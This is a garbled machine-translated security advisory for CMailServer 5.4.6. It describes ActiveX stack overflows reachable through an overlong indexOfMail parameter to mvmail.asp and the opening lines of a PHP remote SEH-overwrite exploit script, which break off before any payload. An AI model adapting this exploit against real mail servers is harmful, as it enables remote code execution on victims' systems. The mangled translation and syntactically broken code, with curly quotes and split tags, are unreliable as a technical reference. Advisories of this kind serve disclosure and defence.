Issues the date: 2008-07-06
Renewal date: 2008-07-08

Is affected the system:
YoungZSoft CMailServer 5.4.6
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 30098

CMailServer is a section of EMAIL service routine, contains based on the WEB mail service system.

CMailServer installs POP3 Class ActiveX controls (CMailCOM.dll, CLSID 6971D9B8-B53E-4C25-A414-76199768A592) not to confirm the input parameter which correctly provides to the MoveToFolder() way, if the long-distance aggressor submitted to mvmail.asp had ultra long indexOfMail parameter POST request, might trigger the stack overflow, caused the execution random code. Also CLSID is the 0609792F-AB56-4CB6-8909-19CDF72CB2A0 CMailCOM.SMTP kind when processes AddAttach, SetSubject, SetBcc, SetBody, SetCc, SetFrom, SetTo and the SetFromUID way has the similar overflow.

<* origin: bruiser
 
  Link: http://secunia.com/advisories/30940/
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following procedure (method) possibly has the aggressivity, only supplies the safe research and teaching. The user risk is proud!

<? php

        error_reporting(7); $host=$argv[1]; $path=$argv[2];
        $argv[3]? $port = (int) $argv[3]: $port = 80;
        print (“CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwrite \ n”.
               “exploit \ n”.
               “by Nine:Situations:Group::bookoo \ n”);
        $argv[2]? print (“attackin'… \ n”): die (“syntax:  php”. $argv[0]. “[host] [path] [[port]] \ n”.
                                              “example: php”. $argv[0]. “192.168.0.1 /mail/    \ n ".
                                              “   ''    php “. $argv[0].” 192.168.0.1/81      \ n ");
        $url = “http://$host:$port”;
        $win = (strtoupper (substr (PHP_OS, 0, 3)) === 'WIN')? true: false;
        $win? dl (“php_curl.dll”): dl (“php_curl.so”);